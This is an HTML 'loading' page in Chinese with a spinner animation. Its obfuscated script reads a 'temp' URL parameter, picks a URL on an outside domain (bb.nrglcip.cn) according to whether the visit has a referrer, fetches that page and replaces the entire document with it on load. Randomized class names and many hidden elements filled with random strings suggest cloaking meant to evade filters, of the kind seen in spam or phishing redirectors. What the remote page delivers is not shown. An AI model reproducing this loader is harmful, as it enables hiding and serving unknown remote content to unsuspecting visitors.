<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SSGEjdM2uO {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SSGEjdM2uO .Vu78wP1 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SSGEjdM2uO .content {
            line-height: 50px;
            text-align: center
        }

        .SSGEjdM2uO .img {
            width: 100%
        }

        .SSGEjdM2uO .QDnhvUOI {
            text-align: center
        }

        .SSGEjdM2uO .QDnhvUOI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SSGEjdM2uO .QDnhvUOI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SSGEjdM2uO .QDnhvUOI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SSGEjdM2uO .QDnhvUOI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SSGEjdM2uO .QDnhvUOI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SSGEjdM2uO .QDnhvUOI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SSGEjdM2uO .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yjX1CicDc(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var V39IEB = yjX1CicDc('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ V39IEB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ V39IEB +".html?a=share";
		}
		
        W47z5rZg2=url+"#"+new Date().getTime();
        W47z5rZg2 && function() {
            $.get(W47z5rZg2, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>MAPp7F1mQgV3V7A2sMIB28YABhYGcpPrNw553j2AsoVoSrJseVPXeJ1m7a0EQqUXC7syDup9R4</div>
<ul style='display:none' >oVjfbVizIuPKI7EP70qImgRDtIwnRSG1QzuJXZzjUYZgrjGWmm9ennIUkJavXX0sy3Bm2XEU</ul>
<span style='display:none'>QUdUzxQ1bBHdy8Bb</span>
<h1 style='display:none' >GyJURW2Yy0HP6PIPXgPmTwh6f</h1>
<ul style='display:none' >oVjfbVizIuPKI7EP70qImgRDtIwnRSG1QzuJXZzjUYZgrjGWmm9ennIUkJavXX0sy3Bm2XEU</ul>
<ul style='display:none' >oVjfbVizIuPKI7EP70qImgRDtIwnRSG1QzuJXZzjUYZgrjGWmm9ennIUkJavXX0sy3Bm2XEU</ul>
<div style='display:none'>MAPp7F1mQgV3V7A2sMIB28YABhYGcpPrNw553j2AsoVoSrJseVPXeJ1m7a0EQqUXC7syDup9R4</div><div class="SSGEjdM2uO">
    <div class="Vu78wP1">
        <div class="QDnhvUOI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>RerZ2jQyW9Z9tTI78ITUjOiNEkow9KaFa2E4LYvQ5VvhNuBahwp0HOaivEWKJayjkfMC</a>
<div style='display:none'>FROsdZMnsctpsBtH7cHuD0Aew5JhMrHrqUh7fUweNN8fmLkG99o</div>
<img  src='' style='display:none'>
<b style='display:none' >JyLsQeONBoKHdrjAmC1nSuINLEDI8BrW</b>
<div style='display:none'>FROsdZMnsctpsBtH7cHuD0Aew5JhMrHrqUh7fUweNN8fmLkG99o</div>
<a  href='#' style='display:none'>RerZ2jQyW9Z9tTI78ITUjOiNEkow9KaFa2E4LYvQ5VvhNuBahwp0HOaivEWKJayjkfMC</a>
<p  style='display:none'>dIMVx9oUltyJeT7VT0uMEtd1IrdsegSo3Ntx8bS4QJLf63X</p>
<ul style='display:none' >HYYmZpkWPJo0VgW3YkvS8ZROxeL0hgZyUzYWCZe1CysvWSowEQ7lb4q02wfpVq5Lk4lUf6</ul></body>
</html>